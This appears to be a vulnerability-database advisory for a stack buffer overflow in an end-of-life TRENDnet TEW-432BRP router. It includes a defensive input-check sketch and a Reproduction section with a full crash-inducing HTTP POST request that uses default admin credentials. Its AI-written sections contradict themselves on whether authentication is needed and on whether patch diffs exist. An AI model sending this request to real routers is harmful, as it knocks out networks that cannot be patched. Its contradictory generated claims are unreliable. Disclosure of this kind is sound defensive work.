VYPR
High severity · 8.8 · NVD Advisory · Published May 30, 2026

CVE-2026-10122


Description

A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. It affects the function formSetProtocolFilter of the file /goform/formSetProtocolFilter. Manipulating the argument protocol_name leads to a stack-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

TRENDnet TEW-432BRP router has a stack-based buffer overflow in formSetProtocolFilter, allowing remote unauthenticated attackers to crash the device or potentially execute arbitrary code.

Vulnerability

A stack-based buffer overflow vulnerability exists in the TRENDnet TEW-432BRP router running firmware version 3.10B20. The flaw resides in the formSetProtocolFilter function behind the /goform/formSetProtocolFilter endpoint. The function copies the protocol_name parameter directly into a stack-based buffer without performing any length checks, enabling an overflow when an overly long string is supplied. The product has been end-of-life (EOL) since 2009 and is no longer supported by the vendor [1].

Exploitation

An attacker can exploit this vulnerability remotely without requiring any prior authentication. By sending a crafted HTTP POST request to the /goform/formSetProtocolFilter endpoint with an excessively long protocol_name parameter, the stack buffer is overflowed. The public exploit proof-of-concept (PoC) demonstrates a crash by sending a long string of 'a' characters; further refinement could allow overwriting the return address to achieve arbitrary code execution [1].

Impact

Successful exploitation leads to a stack buffer overflow, potentially causing denial of service (device crash) or, with a carefully crafted payload, arbitrary code execution with the privileges of the web server process (boa). This could allow an attacker to fully compromise the router, altering network traffic, exfiltrating data, or using the device as a pivot for further attacks [1].

Mitigation

No fix is available. The vendor has stated that the TEW-432BRP has been end-of-life for 15 years (since 2009) and will not be patched. Users are strongly advised to replace the device with a supported and current router model. The vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1].

AI Insight generated on May 30, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input validation in formSetProtocolFilter allows an unbounded stack copy of the protocol_name parameter, causing a stack-based buffer overflow."

Attack vector

An unauthenticated remote attacker sends a crafted HTTP POST request to `/goform/formSetProtocolFilter` with an overly long `protocol_name` parameter. The request includes a Basic Authorization header (default credentials `admin:admin`). The long string overflows a stack buffer in the `formSetProtocolFilter` function, overwriting the return address and enabling arbitrary code execution. [1]

Affected code

The vulnerability is in the `formSetProtocolFilter` function within the `/goform/formSetProtocolFilter` handler of the boa binary on the TRENDnet TEW-432BRP router (firmware version 3.10B20). The `protocol_name` argument is copied directly to a stack-based local variable without any length check, allowing an attacker to overwrite the return address. [1]

What the fix does

No patch is available. The vendor states the product has been end-of-life since 2009 and will not be fixed. The researcher recommends checking string content during input extraction to prevent the unbounded copy that leads to the stack overflow. [1]
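The researcher's recommendation, sketched as an added example (not code from the firmware, the vendor or the advisory): a form-field extractor that checks the value's length before copying it into a fixed buffer. `extract_field`, `protocol_filter_status` and `PROTO_NAME_MAX` with its value of 32 are assumptions; the page does not state the real buffer size.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limit for illustration; the page does not give the real buffer size. */
#define PROTO_NAME_MAX 32

enum { FIELD_OK = 0, FIELD_MISSING = -1, FIELD_TOO_LONG = -2, FIELD_BAD_CHAR = -3 };

/* Copy the raw (not percent-decoded) value of `key` from a urlencoded body
 * into out[out_sz]. Nothing is copied unless the whole value fits. */
int extract_field(const char *body, const char *key, char *out, size_t out_sz)
{
    size_t klen = strlen(key);
    const char *p = body;

    if (out_sz == 0)
        return FIELD_TOO_LONG;
    out[0] = '\0';

    while (p && *p) {
        const char *end = strchr(p, '&');              /* end of this key=value pair */
        size_t plen = end ? (size_t)(end - p) : strlen(p);

        if (plen > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *val = p + klen + 1;
            size_t vlen = plen - klen - 1;

            if (vlen >= out_sz)                        /* length check before any copy */
                return FIELD_TOO_LONG;
            for (size_t i = 0; i < vlen; i++)          /* printable ASCII only */
                if ((unsigned char)val[i] < 0x20 || (unsigned char)val[i] > 0x7e)
                    return FIELD_BAD_CHAR;
            memcpy(out, val, vlen);
            out[vlen] = '\0';
            return FIELD_OK;
        }
        p = end ? end + 1 : NULL;
    }
    return FIELD_MISSING;
}

/* Hypothetical handler skeleton: answer 400 instead of copying an oversized name. */
int protocol_filter_status(const char *body)
{
    char name[PROTO_NAME_MAX];
    return extract_field(body, "protocol_name", name, sizeof name) == FIELD_OK ? 200 : 400;
}
```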

Preconditions

  • network: The attacker must be able to reach the router's web management interface over the network.
  • auth: The attacker must know or guess the router's IP address and have valid credentials (default admin:admin).
  • config: The router must be running firmware version 3.10B20 of the TEW-432BRP.
  • input: The attacker sends a POST request with a protocol_name parameter exceeding the stack buffer size.

Reproduction

Send the following HTTP POST request to the router (replace 192.168.10.1 with the target IP):

``` POST /goform/formSetProtocolFilter HTTP/1.1 Host: 192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 932

edit_row=-1&filters=4&mode=0&enable=1&protocol_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&protocol=0&start_port=5000&end_port=10000&add=Add&webpage=fw_protocolfilter.asp ```

The router will crash and become unresponsive. [1]

Generated on May 30, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4
